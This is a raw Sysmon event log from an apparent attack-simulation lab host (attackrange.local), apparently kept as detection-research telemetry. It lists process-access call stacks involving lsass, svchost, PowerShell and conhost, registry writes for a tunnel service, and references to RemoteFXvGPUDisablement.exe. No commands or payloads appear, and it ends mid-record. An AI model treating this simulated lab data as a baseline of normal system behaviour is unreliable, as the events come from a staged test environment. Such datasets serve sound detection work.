12:00:46.252{266CAFBE-646E-6064-1D00-00000000AE01}23122396C:\Windows\system32\conhost.exe{266CAFBE-646E-6064-1B00-00000000AE01}2292C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001364Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:00:46.252{266CAFBE-646E-6064-1C00-00000000AE01}23042400C:\Windows\system32\conhost.exe{266CAFBE-646E-6064-1900-00000000AE01}2276C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 13241300x80000000000000001363Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-SetValue2021-03-31 12:00:46.237{266CAFBE-6467-6064-0100-00000000AE01}4SystemHKLM\System\CurrentControlSet\Services\tunnel\DriverMinorVersionDWORD (0x00000000) 13241300x80000000000000001362Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-SetValue2021-03-31 12:00:46.237{266CAFBE-6467-6064-0100-00000000AE01}4SystemHKLM\System\CurrentControlSet\Services\tunnel\DriverMajorVersionDWORD (0x00000001) 13241300x80000000000000001361Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-SetValue2021-03-31 12:00:46.237{266CAFBE-6467-6064-0100-00000000AE01}4SystemHKLM\System\CurrentControlSet\Services\tunnel\NdisMinorVersionDWORD (0x0000001e) 13241300x80000000000000001360Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-SetValue2021-03-31 12:00:46.237{266CAFBE-6467-6064-0100-00000000AE01}4SystemHKLM\System\CurrentControlSet\Services\tunnel\NdisMajorVersionDWORD (0x00000006) 13241300x80000000000000001359Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-SetValue2021-03-31 12:00:46.221{266CAFBE-6467-6064-0100-00000000AE01}4SystemHKLM\System\CurrentControlSet\Services\tunnel\Enum\NextInstanceDWORD (0x00000001) 13241300x80000000000000001358Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-SetValue2021-03-31 12:00:46.221{266CAFBE-6467-6064-0100-00000000AE01}4SystemHKLM\System\CurrentControlSet\Services\tunnel\Enum\CountDWORD (0x00000001) 13241300x80000000000000001357Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-SetValue2021-03-31 12:00:46.221{266CAFBE-6467-6064-0100-00000000AE01}4SystemHKLM\System\CurrentControlSet\Services\tunnel\Enum\0SWD\IP_TUNNEL_VBUS\ISATAP_1 10341000x80000000000000001356Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:00:46.221{266CAFBE-646C-6064-1200-00000000AE01}11961372C:\Windows\system32\svchost.exe{266CAFBE-646C-6064-1000-00000000AE01}1124C:\Windows\system32\svchost.exe0x100000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|c:\windows\system32\es.dll+14045|c:\windows\system32\es.dll+200bc|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+2759|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e 10341000x80000000000000001355Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:00:46.206{266CAFBE-646A-6064-0B00-00000000AE01}856888C:\Windows\system32\lsass.exe{266CAFBE-646C-6064-1000-00000000AE01}1124C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\system32\lsasrv.dll+10d9e|C:\Windows\system32\lsasrv.dll+1ecba|C:\Windows\SYSTEM32\samsrv.dll+5df1|C:\Windows\SYSTEM32\samsrv.dll+5cf2|C:\Windows\SYSTEM32\samsrv.dll+1794e|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001354Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:00:46.190{266CAFBE-646A-6064-0B00-00000000AE01}856888C:\Windows\system32\lsass.exe{266CAFBE-646C-6064-1000-00000000AE01}1124C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\system32\lsasrv.dll+10d9e|C:\Windows\system32\lsasrv.dll+1ecba|C:\Windows\SYSTEM32\samsrv.dll+5df1|C:\Windows\SYSTEM32\samsrv.dll+5cf2|C:\Windows\SYSTEM32\samsrv.dll+1794e|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001353Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:00:46.190{266CAFBE-6469-6064-0500-00000000AE01}6241132C:\Windows\system32\csrss.exe{266CAFBE-646E-6064-1E00-00000000AE01}2332C:\Windows\system32\conhost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\SYSTEM32\CSRSRV.dll+1a30|C:\Windows\SYSTEM32\CSRSRV.dll+5c09|C:\Windows\SYSTEM32\ntdll.dll+5182f 10341000x80000000000000001352Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:00:46.174{266CAFBE-6469-6064-0500-00000000AE01}6241132C:\Windows\system32\csrss.exe{00000000-0000-0000-0000-000000000000}2312C:\Windows\system32\conhost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\SYSTEM32\CSRSRV.dll+1a30|C:\Windows\SYSTEM32\CSRSRV.dll+5c09|C:\Windows\SYSTEM32\ntdll.dll+5182f 10341000x80000000000000001351Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:00:46.174{266CAFBE-6469-6064-0500-00000000AE01}624640C:\Windows\system32\csrss.exe{266CAFBE-646E-6064-1C00-00000000AE01}2304C:\Windows\system32\conhost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\SYSTEM32\CSRSRV.dll+1a30|C:\Windows\SYSTEM32\CSRSRV.dll+5c09|C:\Windows\SYSTEM32\ntdll.dll+5182f 10341000x80000000000000001350Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:00:46.159{266CAFBE-6469-6064-0500-00000000AE01}6241132C:\Windows\system32\csrss.exe{00000000-0000-0000-0000-000000000000}2292C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5182f 10341000x80000000000000001349Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:00:46.159{266CAFBE-646C-6064-1000-00000000AE01}11241968C:\Windows\system32\svchost.exe{00000000-0000-0000-0000-000000000000}2292C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7354|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|c:\windows\system32\UBPM.dll+a7a1|c:\windows\system32\UBPM.dll+fa34|c:\windows\system32\UBPM.dll+cdcc|c:\windows\system32\UBPM.dll+d395|c:\windows\system32\UBPM.dll+dc95|c:\windows\system32\UBPM.dll+e9dd|c:\windows\system32\UBPM.dll+e1ba|c:\windows\system32\UBPM.dll+de12|c:\windows\system32\EventAggregation.dll+3e22|c:\windows\system32\EventAggregation.dll+389a|c:\windows\system32\EventAggregation.dll+332f|c:\windows\system32\EventAggregation.dll+2e28|C:\Windows\SYSTEM32\ntdll.dll+65bf5|C:\Windows\SYSTEM32\ntdll.dll+658fd|C:\Windows\SYSTEM32\ntdll.dll+65760|C:\Windows\SYSTEM32\ntdll.dll+3a890|C:\Windows\SYSTEM32\ntdll.dll+1ed03|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001348Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:00:46.159{266CAFBE-646C-6064-0C00-00000000AE01}592708C:\Windows\system32\svchost.exe{266CAFBE-646C-6064-1000-00000000AE01}1124C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8b22|c:\windows\system32\lsm.dll+8a76|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001347Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:00:46.159{266CAFBE-646C-6064-0C00-00000000AE01}592708C:\Windows\system32\svchost.exe{266CAFBE-646C-6064-1000-00000000AE01}1124C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8a38|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001346Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:00:46.159{266CAFBE-6469-6064-0500-00000000AE01}624640C:\Windows\system32\csrss.exe{00000000-0000-0000-0000-000000000000}2284C:\Windows\System32\RemoteFXvGPUDisablement.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5182f 10341000x80000000000000001345Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:00:46.159{266CAFBE-646C-6064-1000-00000000AE01}11241968C:\Windows\system32\svchost.exe{00000000-0000-0000-0000-000000000000}2284C:\Windows\System32\RemoteFXvGPUDisablement.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7354|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|c:\windows\system32\UBPM.dll+a7a1|c:\windows\system32\UBPM.dll+fa34|c:\windows\system32\UBPM.dll+cdcc|c:\windows\system32\UBPM.dll+d395|c:\windows\system32\UBPM.dll+dc95|c:\windows\system32\UBPM.dll+e9dd|c:\windows\system32\UBPM.dll+e1ba|c:\windows\system32\UBPM.dll+de12|c:\windows\system32\EventAggregation.dll+3e22|c:\windows\system32\EventAggregation.dll+389a|c:\windows\system32\EventAggregation.dll+332f|c:\windows\system32\EventAggregation.dll+2e28|C:\Windows\SYSTEM32\ntdll.dll+65bf5|C:\Windows\SYSTEM32\ntdll.dll+658fd|C:\Windows\SYSTEM32\ntdll.dll+65760|C:\Windows\SYSTEM32\ntdll.dll+3a890|C:\Windows\SYSTEM32\ntdll.dll+1ed03|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001344Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:00:46.143{266CAFBE-646C-6064-0C00-00000000AE01}592708C:\Windows\system32\svchost.exe{266CAFBE-646C-6064-1000-00000000AE01}1124C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8b22|c:\windows\system32\lsm.dll+8a76|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001343Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:00:46.143{266CAFBE-646C-6064-0C00-00000000AE01}592708C:\Windows\system32\svchost.exe{266CAFBE-646C-6064-1000-00000000AE01}1124C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8a38|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001342Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:00:46.143{266CAFBE-6469-6064-0500-00000000AE01}6241132C:\Windows\system32\csrss.exe{00000000-0000-0000-0000-000000000000}2276C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5182f 10341000x80000000000000001341Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:00:46.143{266CAFBE-646C-6064-1000-00000000AE01}11241968C:\Windows\system32\svchost.exe{00000000-0000-0000-0000-000000000000}2276C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7354|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|c:\windows\system32\UBPM.dll+a7a1|c:\windows\system32\UBPM.dll+fa34|c:\windows\system32\UBPM.dll+cdcc|c:\windows\system32\UBPM.dll+d395|c:\windows\system32\UBPM.dll+dc95|c:\windows\system32\UBPM.dll+e9dd|c:\windows\system32\UBPM.dll+e1ba|c:\windows\system32\UBPM.dll+de12|c:\windows\system32\EventAggregation.dll+3e22|c:\windows\system32\EventAggregation.dll+389a|c:\windows\system32\EventAggregation.dll+332f|c:\windows\system32\EventAggregation.dll+2e28|C:\Windows\SYSTEM32\ntdll.dll+65bf5|C:\Windows\SYSTEM32\ntdll.dll+658fd|C:\Windows\SYSTEM32\ntdll.dll+65760|C:\Windows\SYSTEM32\ntdll.dll+3a890|C:\Windows\SYSTEM32\ntdll.dll+1ed03|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001340Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:00:46.127{266CAFBE-646C-6064-0C00-00000000AE01}592708C:\Windows\system32\svchost.exe{266CAFBE-646C-6064-1000-00000000AE01}1124C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8b22|c:\windows\system32\lsm.dll+8a76|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001339Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:00:46.127{266CAFBE-646C-6064-0C00-00000000AE01}592708C:\Windows\system32\svchost.exe{266CAFBE-646C-6064-1000-00000000AE01}1124C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8a38|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001338Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:00:46.127{266CAFBE-646C-6064-0C00-00000000AE01}592708C:\Windows\system32\svchost.exe{266CAFBE-646C-6064-1000-00000000AE01}1124C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001337Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:00:46.127{266CAFBE-646C-6064-0C00-00000000AE01}592708C:\Windows\system32\svchost.exe{266CAFBE-646C-6064-1000-00000000AE01}1124C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001336Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:00:46.127{266CAFBE-646C-6064-0C00-00000000AE01}592708C:\Windows\system32\svchost.exe{266CAFBE-646C-6064-1000-00000000AE01}1124C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001335Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:00:46.127{266CAFBE-646C-6064-0C00-00000000AE01}592708C:\Windows\system32\svchost.exe{266CAFBE-646C-6064-1000-00000000AE01}1124C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001334Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:00:46.127{266CAFBE-646C-6064-0C00-00000000AE01}592708C:\Windows\system32\svchost.exe{266CAFBE-646C-6064-1000-00000000AE01}1124C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001333Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:00:46.127{266CAFBE-646C-6064-0C00-00000000AE01}592708C:\Windows\system32\svchost.exe{266CAFBE-646C-6064-1000-00000000AE01}1124C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001332Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 